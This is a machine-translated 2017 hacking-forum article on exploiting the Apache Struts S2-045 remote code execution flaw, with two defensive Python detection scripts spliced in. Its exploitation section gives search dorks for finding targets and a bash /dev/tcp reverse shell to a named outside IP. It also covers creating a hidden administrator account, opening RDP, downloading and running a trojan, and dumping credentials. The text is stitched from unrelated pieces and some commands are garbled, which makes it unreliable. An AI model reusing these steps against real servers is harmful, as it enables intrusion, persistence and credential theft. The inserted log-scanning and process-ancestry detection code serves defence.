myhack58 | 佚名 | MYHACK58:62201784086
History: Mar 08, 2017 - 12:00 a.m.

How to quickly use the S2-045 vulnerability to gain server access - vulnerability warning - the black bar safety net

2017-03-08 00:00:00
佚名
www.myhack58.com
3207

CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.975 High
Percentile: 100.0%

1.1 CVE-2017-5638 vulnerability profile
Apache Struts 2 is the world's most popular Java web server framework. However, a high-risk security vulnerability, CVE-2017-5638 (S2-045), has been found in Struts 2. The vulnerability affects Struts 2.3.5 - Struts 2.3.31 and Struts 2.5 - Struts 2.5.10.
Vulnerability ID: CVE-2017-5638
Vulnerability rating: HIGH
Vulnerability name: S2-045: Struts 2 remote code execution vulnerability
Vulnerability impact: possible RCE during file upload when the upload is handled by the Jakarta Multipart parser implementation
Affected versions: Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10
Repair solution:
Upgrade to Struts 2.3.32 or Struts 2.5.10.1
Struts 2.3.32 download address:
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32
Struts 2.5.10.1 download address: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
Vulnerability principle: by default Struts 2 parses the Content-Type header of an uploaded file, and this parsing is flawed. When parsing fails, the error message, which contains the attacker-supplied header value, is evaluated as an OGNL expression.
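As an added defender-side example (not code from the original article or from the Struts project), the following Python script turns the profile above into two checks: an affected-version test over the version ranges listed, and a scan of request-log lines for Content-Type values that cannot be a legitimate type/subtype header, which is exactly the trait the principle paragraph describes. The log line format, the sample IPs, the marker list and the version strings are assumptions constructed for the example.

```python
"""Defender-side checks for S2-045 (CVE-2017-5638): an affected-version test over
the ranges in the advisory, and a scanner that flags Content-Type header values
which cannot be legitimate headers. Added example, not the article's own code."""
import re
from typing import List, Optional, Tuple

# Affected ranges from the advisory: 2.3.5 - 2.3.31 and 2.5 - 2.5.10, inclusive.
# Tuples compare lexicographically, so the fixed release 2.5.10.1 -> (2, 5, 10, 1)
# sorts above (2, 5, 10) and is treated as fixed, while 2.5 -> (2, 5) is affected.
AFFECTED_RANGES = (((2, 3, 5), (2, 3, 31)), ((2, 5), (2, 5, 10)))


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.5.10.1' or 'struts2-core-2.3.31.jar' -> (2, 5, 10, 1) / (2, 3, 31)."""
    m = re.search(r"\d+(?:\.\d+)+", text)
    if not m:
        raise ValueError(f"no dotted version number in {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def is_affected(version: str) -> bool:
    """True when the Struts 2 version falls inside an affected range."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


# A well-formed Content-Type is type/subtype followed by optional ;name=value
# parameters built from RFC 7230 token characters or quoted strings. OGNL needs
# '{', '(' and quotes, none of which fit that grammar.
TCHAR = r"[A-Za-z0-9!#$%&'*+.^_`|~-]"
_CT_RE = re.compile(rf'^\s*{TCHAR}+/{TCHAR}+(\s*;\s*{TCHAR}+=(?:{TCHAR}+|"[^"\\]*"))*\s*$')
# Substrings that never occur in a legitimate Content-Type (assumed marker list).
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "@ognl", "@java.")


def content_type_reason(value: str) -> Optional[str]:
    """Return why a Content-Type looks like an S2-045 probe, or None if it is clean."""
    for marker in OGNL_MARKERS:
        if marker in value:
            return f"OGNL marker {marker!r}"
    if not _CT_RE.match(value):
        return "not a valid type/subtype;param=value header"
    return None


# Constructed log format: timestamp source method path "Content-Type value".
SAMPLE_LOG = """\
2017-03-08T00:00:01Z 198.51.100.7 POST /index.action "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"
2017-03-08T00:00:02Z 198.51.100.7 GET /login.action "text/html; charset=UTF-8"
2017-03-08T00:00:03Z 203.0.113.9 POST /index.action "%{(#sample='constructed, not a working payload').(#sample)}"
2017-03-08T00:00:04Z 203.0.113.9 POST /info.action "multipart/form-data; boundary={bad"
2017-03-08T00:00:05Z 198.51.100.7 POST /upload.action "application/x-www-form-urlencoded"
"""
_LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')


def scan_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, source, path, reason) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ts, src, _method, path, ctype = m.groups()
        reason = content_type_reason(ctype)
        if reason:
            hits.append((ts, src, path, reason))
    return hits


if __name__ == "__main__":
    for v in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(v, "affected" if is_affected(v) else "fixed")
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

The grammar check matters as much as the marker list: the fourth sample line carries no OGNL marker at all, yet a `{` in a boundary parameter is still not a valid header and is flagged, so a probe that avoids the obvious `%{` prefix does not slip through. The version check reads the dotted number from either a bare version or the struts2-core jar file name.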
1.2 Hazard assessment
Actual testing shows that wherever the vulnerability exists, server privileges are obtained on both Windows and Linux. The harm is great; for many people tonight is surely going to be a sleepless night.

1.3 Exploiting the vulnerability in practice
1.3.1 Preparation
  1. Prepare a jsp webshell and save it on a web site, for example as a text file such as 1.txt, so that it can be downloaded over the network.
  2. Prepare a server with its own independent IP, with nc.exe on it.
  3. Prepare a python environment.
    Python 2.7.13 is generally used; download address: https://www.python.org/downloads/release/python-2713/. Choose the installer according to the operating system version. After installation, the first run will report an error: a module needs to be installed, as shown in Figure 1. The poster.encode module is required; download address: https://pypi.python.org/pypi/poster/. Then go to that directory and run python setup.py install to install it. Note that if the system variables for python are not set, the full path must be given to execute it. For example:
    C:\Python27\python.exe C:\Python27\poster-0.8.1\setup.py install
    [Figure 1 image: /Article/UploadPic/2017-3/20173818228916.jpg]
    Figure 1 The missing poster.encode module
  4. Obtain various action pages
    (1) Use zoomeye to find various action pages: search for index.action, login.action, info.action and the like.
    (2) The Baidu search method
    inurl:index. actionsite:edu. cn
    inurl:index. actionsite:gov. cn
    inurl:index. actionsite:com. cn
    Note: don't vandalize; the network security law is very good now!!!
1.3.2 Modifying the poc exploit code
  2. For the Linux version, modify the whoami value to: bash-i>& /dev/tcp/122.115.47.39/4433 0>&1
    Here 122.115.47.39 is the IP of the listening server that receives the reverse shell, and 4433 is the port. Then save the file as poclinux.py, as shown in Figure 2. Some other common commands can also be used: id, whoami, cat /etc/passwd, cat /etc/shadow, etc. Modify the corresponding parameter and save under a different name.
    [Figure 2 image: /Article/UploadPic/2017-3/20173818228744.jpg]
    Figure 2 Modifying the linux poc exploit code
  3. For a Windows server, modify the whoami value to:
    net user antian365$ Wsantian365!*/ add
    net localgroup administratorsantian365$ /add
    Save the poc files as pocwin1.py and pocwin2.py respectively, as shown in Figure 3.
    [Figure 3 image: /Article/UploadPic/2017-3/20173818228139.jpg]
    Figure 3 Modifying the exploit code for Windows
1.3.3 Quickly implementing penetration under Windows
  4. Opening 3389 on the target
    (1) Scan whether the target has 3389 open. If it is open, execute respectively:
    pocwin1.py http://www.myhack58.com/index.action
    pocwin2.py http://www.myhack58.com/index.action
    If the target is vulnerable, this directly adds a user "antian365$" with password "Wsantian365!*". With 3389 open on the server, log in, then download wce64 and run wce64 -w directly to get the current login password; be sure to execute it with administrator rights.
    (2) Opening 3389 directly
    Modify the parameter three times and execute the following code three times in turn to open 3389.
    wmic /namespace:\\root\cimv2\terminalservices pathwin32_terminalservicesetting where (__CLASS != “”) callsetallowtsconnections 1
    wmic/namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where(TerminalName =‘RDP-Tcp’) call setuserauthenticationrequired 1
    reg add"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f
    Opening 3389 is conditional on the target having an independent IP; if it has an internal network IP, use the second method.
  5. The Trojan execution method
    (1) Download the Trojan
    First a Trojan program must be prepared; it needs to get through win2008. Then modify the whoami parameter in win.py:
    Germany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\windows\temp\ma.exe
    ma.exe is saved in the www.myhack58.com web site root directory; it is downloaded directly into the target's c:\windows\temp directory.
    (2) Execute the Trojan: modify the whoami parameter in the poc to the true path and address of ma.exe, as follows. Save the poc and then run it in the original way.
    c:\windows\temp\ma.exe
1.3.4 Ideas for rapid penetration under Linux
  6. Run a listener on the standalone server: on the server with the independent IP, execute "nc -vv -l -p 4433". You can then test the connection to port 4433 of that IP, for example http://www.myhack58.com:4433; if the listening port receives data, it is working normally, otherwise check the firewall rules.
  7. Run the poc
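Added detection example, not part of the article: the post-exploitation steps above (adding an account with net, changing 3389 settings through wmic and reg, a bash /dev/tcp reverse shell) all appear on the host as descendants of the Java process that runs Struts, so process-creation telemetry with pid/ppid links is enough to flag them. The ProcEvent shape, the process-name lists, the rule texts and the sample events (documentation IP 192.0.2.10, placeholder account name) are constructed for this example. The ancestry walk is the part worth copying: java normally spawns cmd.exe, which in turn spawns net.exe and net1.exe, so a parent-only rule would miss the account creation.

```python
"""Process-ancestry detection for the post-exploitation steps this article walks
through: a Struts application runs inside a Java process, so net/wmic/reg or a
bash /dev/tcp reverse shell appearing under java(.exe) is the host-side signal.
Added example with constructed events, not the article's own code."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field shape assumed for this example)."""
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str


WEB_PARENTS = ("java", "java.exe", "javaw.exe", "tomcat8.exe", "tomcat9.exe")
ADMIN_TOOLS = ("net.exe", "net1.exe", "wmic.exe", "reg.exe", "nc", "nc.exe")
SHELLS = ("cmd.exe", "powershell.exe", "sh", "bash", "dash")

# Ordered from most to least specific; the first match wins. `c` is the child's
# lowercase image basename, `cmd` its lowercase command line.
RULES = (
    ("critical: bash /dev/tcp reverse shell under web process",
     lambda c, cmd: "/dev/tcp/" in cmd),
    ("critical: local account change (net ... /add) under web process",
     lambda c, cmd: re.search(r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\b.*\s/add\b", cmd) is not None),
    ("critical: RDP (3389) configuration change under web process",
     lambda c, cmd: "terminalservices" in cmd or "terminal server" in cmd),
    ("high: admin tool spawned under web process", lambda c, cmd: c in ADMIN_TOOLS),
    ("medium: shell spawned under web process", lambda c, cmd: c in SHELLS),
)


def basename(path: str) -> str:
    """Lowercase file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def web_ancestor(ev: ProcEvent, table: Dict[int, ProcEvent], max_depth: int = 4) -> Optional[ProcEvent]:
    """Walk up ppid links; return the web-app process if one sits within max_depth hops."""
    cur = ev
    for _ in range(max_depth):
        parent = table.get(cur.ppid)
        if parent is None:
            return None          # chain leaves the telemetry we have
        if basename(parent.image) in WEB_PARENTS:
            return parent
        cur = parent
    return None


def detect(events: List[ProcEvent], max_depth: int = 4) -> Dict[int, str]:
    """Map pid -> verdict for every event that descends from a web-app process."""
    table = {e.pid: e for e in events}
    verdicts: Dict[int, str] = {}
    for ev in events:
        if web_ancestor(ev, table, max_depth) is None:
            continue
        child, cmd = basename(ev.image), ev.cmdline.lower()
        for verdict, pred in RULES:
            if pred(child, cmd):
                verdicts[ev.pid] = verdict
                break
    return verdicts


# Constructed sample telemetry: one Windows host and one Linux host.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Java\jre\bin\java.exe", "java -jar tomcat.jar"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c net user CONSTRUCTED_USER CONSTRUCTED_PW /add"),
    ProcEvent(201, 200, r"C:\Windows\System32\net.exe", "net user CONSTRUCTED_USER CONSTRUCTED_PW /add"),
    ProcEvent(202, 201, r"C:\Windows\System32\net1.exe", "net1 user CONSTRUCTED_USER CONSTRUCTED_PW /add"),
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c wmic /namespace:\\root\cimv2\terminalservices ..."),
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(401, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe"),   # an admin's own shell: benign
    ProcEvent(500, 1, "/usr/bin/java", "java -jar tomcat.jar"),
    ProcEvent(501, 500, "/bin/bash", "bash -i >& /dev/tcp/192.0.2.10/4433 0>&1"),
    ProcEvent(502, 500, "/bin/sh", "sh -c id"),
]

if __name__ == "__main__":
    for pid, verdict in sorted(detect(SAMPLE_EVENTS).items()):
        print(pid, verdict)
```

Event 401 is the control case: the same cmd.exe image under explorer.exe produces no verdict, which keeps the rule from paging on ordinary administrator activity, while the net1.exe event three hops below java is still caught.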
